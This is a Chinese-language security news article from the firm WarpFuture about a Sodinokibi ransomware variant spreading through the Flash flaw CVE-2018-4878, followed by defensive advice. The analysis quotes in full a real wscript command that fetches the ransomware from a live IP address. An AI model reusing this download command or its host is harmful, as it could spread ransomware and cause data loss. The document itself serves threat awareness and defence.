1. 北竹林首页
  2. 资讯
  3. 技术指南

曲速未来 消息:Sodinokibi勒索病毒利用Flash漏洞强势来袭

区块链安全咨询公司 曲速未来 表示:勒索病毒攻击事件并没有随着GandCrab的退出而减少,全球各地每天仍有用户因为数据遭到加密而损失惨重

区块链安全咨询公司 曲速未来 表示:自GandCrab宣布停止运营以来,勒索病毒攻击事件并没有随着GandCrab的退出而减少,全球各地每天仍有用户因为数据遭到加密而损失惨重。在后来居上的各个勒索病毒家族中,Sodinokibi勒索已经成为了现在全球最流行的勒索病毒之一,也叫称为GandCrab的”接班人”。

Sodinokibi勒索病毒的部分变种在加密后会将受害主机的屏幕设置成深蓝色,因此也被称为“DeepBlue”勒索。

近日,国外安全研究人员发现Sodinokibi勒索病毒利用CVE-2018-4878漏洞进行传播:

一、漏洞利用分析

CVE-2018-4878漏洞是一个UAF漏洞,位于Flash的com.adobe.tvsdk包中,如下所示:

4a95108023de7530a5e603ee40ee798e-sz_553022.png

shellcode代码通过获取CreateProcessA的函数地址,调用CMD命令执行恶意下载操作,如下所示:

d0adb2dcb165c9d572ece2f96beeab2b-sz_631829.png

动态调式,获取CMD命令,如下所示:

d7f502e18cd463d85ad3e07bbc345f1b-sz_508605.png

获取的CMD命令代码,如下所示:

3739f7bbcf9e768f9ed1a22539f97350-sz_257220.png

通过CMD命令,调用WScript进程执行脚本,如下所示:

c74a1bf07ae55ac8c314963d5131db84-sz_319854.png

调用脚本命令参数,如下所示:

1369613c643526a9643202ab732abcc5-sz_141961.png

脚本内容,如下所示:

wsCripT  //B  //E:JScript T.t “ctELwuzs5N95a”

“http://176.57.220.28/?NTcxMDkx&OHqFPlRweVwKRC&PbNNzQhVmHSdZF=difference&t4tsdfsg4=7cDOArojBfTcwxlmosOVl1B86D7i0fVz0LPhJ6FqEfeNA0U_aKTErg92lr8zLgkLYsk9w&SGZPTVoZDZUE=constitution&mtcfabVTX=referred&TfDencoKhLpWmWy=detonator&CMIHZK=everyone&jsUXxcuwwzXQs=known&niJebNseKTId=detonator&SkHDbOnITQuC=wrapped&fwFOBGCULm=professional&AiNfixYteBuTPc=professional&wpdPCwSHxUCq=community&ff5sdfds=w3nQMvXcJxnQFYbGMv3DSKNbNkbWHViPxoiG9MildZmqZGX_k7vDfF-qoVXcCgWRxfQuf&LUbaPnkXKQhJ=known&pUljixFjY=community&fspuvfWRXEoRhF=known&UolvaBlNUoGliy=referred&dcavylKzLRHQNDE2Nzk4” “?

通过脚本下载Sodinokibi勒索病毒,能通过动态调试,提取出里面核心Payload,如下所示:

f4341dbb6c2b3b29c5f48d2dbaf1937a-sz_662847.png

将此勒索变种的核心功能代码与我们之前捕获分析的Sodinokibi勒索病毒核心代码进行对比分析,如下所示:

4713aaec1693615a43df3c2c83383393-sz_846832.png

代码的相似度达到94%以上,可以认定为是Sodinokibi勒索病毒的变种样本,此勒索病毒变种生成的最新的“蓝屏”桌面背景,如下所示:

05f69fde2490d5fcf0be884a1aeb6fd5-sz_671716.png

生成的勒索信息文本,如下所示:

9ca04dcfa958e6bd0db3800c3ff44ca7-sz_721779.png

解密的网址,如下所示:

00902caf7af11b85cc9d4ab9f255ada3-sz_589700.png

二、解决方案

遗憾的是,这款病毒暂时还没有解密工具,建议尽快对感染主机进行断网隔离。深信服提醒广大用户尽快做好病毒检测与防御措施,防范该病毒家族的勒索攻击。

病毒防御

区块链安全咨询公司 曲速未来 表示:在此,再次提醒广大用户,勒索病毒以防为主,目前大部分勒索病毒加密后的文件都无法解密,注意日常防范措施:

1、及时给电脑打补丁,修复漏洞。

2、对重要的数据文件定期进行非本地备份。

3、不要点击来源不明的邮件附件,不从不明网站下载软件。

4、尽量关闭不必要的文件共享权限。

5、更改账户密码,设置强密码,避免使用统一的密码,因为统一的密码会导致一台被攻破,多台遭殃。

6、如果业务上无需使用RDP的,建议关闭RDP。

最后,建议企业对全网进行一次安全检查和杀毒扫描,加强防护工作。

本文内容由 曲速未来 (WarpFuture.com) 安全咨询公司整理编译,转载请注明。 曲速未来提供包括主链安全、交易所安全、交易所钱包安全、DAPP开发安全、智能合约开发安全等相关区块链安全咨询服务。

声明:登载此文出于传递更多信息之目的,观点仅代表作者本人,绝不代表北竹林赞同其观点或证实其描述。

提示:投资有风险,入市须谨慎。本资讯不作为投资理财建议。

联系我们

QQ:

1739447883

邮箱:

1739447883@qq.com